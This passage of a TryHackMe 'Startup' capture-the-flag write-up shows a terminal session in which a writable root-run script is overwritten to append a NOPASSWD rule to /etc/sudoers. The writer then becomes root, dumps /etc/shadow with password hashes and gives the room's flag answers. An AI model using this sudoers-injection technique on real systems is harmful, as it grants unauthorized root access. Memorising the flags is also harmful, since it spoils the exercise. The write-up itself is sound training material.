#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
lennie@startup:~/scripts$ ls -al /etc/print.sh
ls -al /etc/print.sh
-rwx------ 1 lennie lennie 25 Nov 12  2020 /etc/print.sh
lennie@startup:~/scripts$ cat /etc/print.sh
cat /etc/print.sh
#!/bin/bash
echo "Done!"

lennie@startup:~/scripts$ printf '#!/bin/bash\necho "lennie ALL=NOPASSWD:ALL" >> /etc/sudoers' > /etc/print.sh
<lennie ALL=NOPASSWD:ALL" >> /etc/sudoers' > /etc/print.sh                   
lennie@startup:~/scripts$ cat /etc/print.sh
cat /etc/print.sh
#!/bin/bash
echo "lennie ALL=NOPASSWD:ALL" >> /etc/sudoers

lennie@startup:~/scripts$ sudo -l
sudo -l
sudo: unable to resolve host startup
Matching Defaults entries for lennie on startup:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lennie may run the following commands on startup:
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL

lennie@startup:~/scripts$ sudo su
sudo su
sudo: unable to resolve host startup
root@startup:/home/lennie/scripts# whoami  
whoami
root
root@startup:/home/lennie/scripts# id
id
uid=0(root) gid=0(root) groups=0(root)
root@startup:/home/lennie/scripts# crontab -l
crontab -l
* * * * * /home/lennie/scripts/planner.sh

root@startup:/home/lennie/scripts# cd /root
cd /root
root@startup:~# ls -al
ls -al
total 28
drwx------  4 root root 4096 Nov 12  2020 .
drwxr-xr-x 25 root root 4096 Aug  3 15:46 ..
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
drwxr-xr-x  2 root root 4096 Nov 12  2020 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   38 Nov 12  2020 root.txt
drwx------  2 root root 4096 Nov 12  2020 .ssh
root@startup:~# cat root.txt
cat root.txt
THM{f963aaa6a430f210222158ae15c3d76d}

root@startup:~# cat /etc/shadow
cat /etc/shadow
root:*:18530:0:99999:7:::
daemon:*:18530:0:99999:7:::
bin:*:18530:0:99999:7:::
sys:*:18530:0:99999:7:::
sync:*:18530:0:99999:7:::
games:*:18530:0:99999:7:::
man:*:18530:0:99999:7:::
lp:*:18530:0:99999:7:::
mail:*:18530:0:99999:7:::
news:*:18530:0:99999:7:::
uucp:*:18530:0:99999:7:::
proxy:*:18530:0:99999:7:::
www-data:*:18530:0:99999:7:::
backup:*:18530:0:99999:7:::
list:*:18530:0:99999:7:::
irc:*:18530:0:99999:7:::
gnats:*:18530:0:99999:7:::
nobody:*:18530:0:99999:7:::
systemd-timesync:*:18530:0:99999:7:::
systemd-network:*:18530:0:99999:7:::
systemd-resolve:*:18530:0:99999:7:::
systemd-bus-proxy:*:18530:0:99999:7:::
syslog:*:18530:0:99999:7:::
_apt:*:18530:0:99999:7:::
lxd:*:18530:0:99999:7:::
messagebus:*:18530:0:99999:7:::
uuidd:*:18530:0:99999:7:::
dnsmasq:*:18530:0:99999:7:::
sshd:*:18530:0:99999:7:::
pollinate:*:18530:0:99999:7:::
vagrant:$6$Z8GjeAEi$PNgFlmIHGfdLuvsigNZAARORfLeoT37m3w4UqikISYLqr5lRIDpfNdmU7l9K9fVYMUqhP3octsWBL.QoGn67N.:18578:0:99999:7:::
ftp:*:18578:0:99999:7:::
lennie:$6$EKYFvlbl$SWtqPakF2bJ0bFl1j/79OnJUPNTJ9HalncPCbjlYT8ql1oQNY05kcs1mLRZ1V4zDHbhcquNPj2pbTPG0HAtKv0:18578:0:99999:7:::
ftpsecure:!:18578:0:99999:7:::
root@startup:~# sudo -l
sudo -l
sudo: unable to resolve host startup
Matching Defaults entries for root on startup:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User root may run the following commands on startup:
    (ALL : ALL) ALL

What is the secret spicy soup recipe?

love

What are the contents of user.txt?

THM{03ce3d619b80ccbfb3b7fc81e46c0e79}

What are the contents of root.txt?

THM{f963aaa6a430f210222158ae15c3d76d}

Task 2: Credits

Spice Hut was very happy with your results and it is guaranteed they will spread word about your excellence with their partners. Astounding work!

Find my official writeup here: https://www.youtube.com/watch?v=3qNxI1OggGc

I’d like to thank ku5e for being a good sensei and GeneralClaw, my grammar cop.

I’d like to thank my testers Amit25095, BarZigmon and powershot.

Additionally, I’d love to thank TryHackMe not just for their platform, of which has changed my life, but for giving me this opportunity to give back to the community.

And of course, I’d like to thank you for playing. Hope to see you soon!

Congratulations!

Startup

Startup

Task 1: Welcome to Spice Hut!

Task 2: Credits

CATALOG

FEATURED TAGS

FRIENDS